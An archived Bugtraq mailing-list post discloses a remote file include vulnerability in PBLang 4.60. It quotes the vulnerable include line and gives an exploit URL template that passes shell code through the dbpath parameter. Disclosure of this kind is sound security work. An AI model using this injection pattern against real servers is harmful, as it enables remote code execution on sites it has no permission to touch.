PBLang 4.60 <= (index.php) Remote File Include Vulnerability

To: submit@xxxxxxxxxxx
Subject: PBLang 4.60 <= (index.php) Remote File Include Vulnerability
From: "me you" <r.5.7@xxxxxxxxxxx>
Date: Fri, 16 Feb 2007 13:38:45 +0000
Cc: bugtraq@xxxxxxxxxxxxxxxxx
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

PBLang 4.60 <= (index.php) Remote File Include Vulnerability

Script: PBLang

Version: 4.60

URL:http://downloads.sourceforge.net/pblang/PBL465_nographics.zip?modtime=1098268125&big_mirror=0


Found By: BorN To K!LL

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Bug in:

index.php .....

Bug code:

include($dbpath."/settings/styles/styles.php");

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

ExploiT:
~~~~~
www.site.com/[path]/index.php?dbpath=[SHeLL-Code]

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

GreeTz To:
Dr.2  ,  AsbMay  ,  General C  ,  str0ke  ,  SHiKaA  ,  ThE-LoRd-Of-CrAcKiNg

AsbMay's Group ..  KuW SeC TeaM .....

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

_________________________________________________________________

Don't just search. Find. Check out the new MSN Search!http://search.msn.com/

Prev by Date: Downgrading the Oracle native authentication
Next by Date: Re: Re: Solaris telnet vulnberability - how many on your network?
Previous by thread: Downgrading the Oracle native authentication
Next by thread: Ezboo webstats acces to sensitive files
Index(es):
- Date
- Thread